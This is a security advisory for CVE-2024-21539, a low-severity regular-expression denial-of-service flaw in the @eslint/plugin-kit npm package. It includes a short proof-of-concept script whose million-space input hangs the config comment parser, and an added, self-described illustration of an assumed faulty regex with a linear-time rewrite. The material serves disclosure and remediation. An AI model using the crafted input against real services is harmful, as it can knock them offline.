Security Advisories

CVE-2024-21539

Published

Last updated

NVD

https://nvd.nist.gov/vuln/detail/CVE-2024-21539

CGA ID

CGA-v55f-9838-wrpj

Severity

3.5

Low

CVSS V3

Summary

Regular Expression Denial of Service (ReDoS) in @eslint/plugin-kit

Description

A very large, specially crafted input string can drive CPU usage up and crash the program.

POC

const { ConfigCommentParser } = require("@eslint/plugin-kit");

// Build a string of one million spaces followed by a single non-delimiter character.
var str = "";
for (var i = 0; i < 1000000; i++) {
  str += " ";
}
str += "A";

console.log("start");
var parser = new ConfigCommentParser();
console.log(parser.parseStringConfig(str, ""));
console.log("end");

// Run `npm i @eslint/plugin-kit` and `node attack.js`:
// the program then hangs with high CPU usage and never prints "end".
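
Why this input shape hangs the parser, as an added illustration that is not code from @eslint/plugin-kit or from this advisory: it assumes the parser collapsed whitespace around `:` and `,` with a regex of the form `/\s*([:,])\s*/g`, shows why the PoC's input makes that quadratic, and gives a single-pass replacement that produces the same output in linear time (the function and variable names are this illustration's own).

```javascript
// Added illustration, not code from @eslint/plugin-kit or from this advisory.
// Assumption: the hot spot is a whitespace-collapsing step of the form
// input.replace(/\s*([:,])\s*/g, "$1"). On a long run of spaces followed by a
// non-delimiter ("A"), the engine greedily consumes the whole run, backtracks
// through it one space at a time without finding ':' or ',', then repeats from
// the next start position: O(n^2) work for n spaces.
const COLLAPSE_RE = /\s*([:,])\s*/gu;

function collapseWithRegex(input) {
  return input.replace(COLLAPSE_RE, "$1");
}

// Linear-time rewrite: one forward pass. Whitespace is buffered and emitted only
// when the next non-space character is not a delimiter; whitespace directly
// after a delimiter is dropped. Same output as the regex for every input.
function collapseLinear(input) {
  let out = "";
  let pendingWs = "";
  let afterDelim = false;
  for (const ch of input) {
    if (/\s/u.test(ch)) {
      if (!afterDelim) pendingWs += ch;
      continue;
    }
    if (ch === ":" || ch === ",") {
      out += ch;
      pendingWs = "";
      afterDelim = true;
      continue;
    }
    out += pendingWs + ch;
    pendingWs = "";
    afterDelim = false;
  }
  return out + pendingWs; // trailing whitespace with no delimiter after it is kept
}

// Constructed input with the same shape as the advisory's PoC: n spaces then "A".
function pocInput(n) {
  return " ".repeat(n) + "A";
}

// Runs the linear version on the PoC shape and reports the wall-clock cost;
// the regex version on the same input does not return in reasonable time.
function demo(n = 1000000) {
  const start = Date.now();
  const length = collapseLinear(pocInput(n)).length;
  return { length, millis: Date.now() - start };
}
```

Run `demo()` to see the million-space input complete in milliseconds; the regex path is kept only so the two can be compared on short inputs.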

References

Affected packages

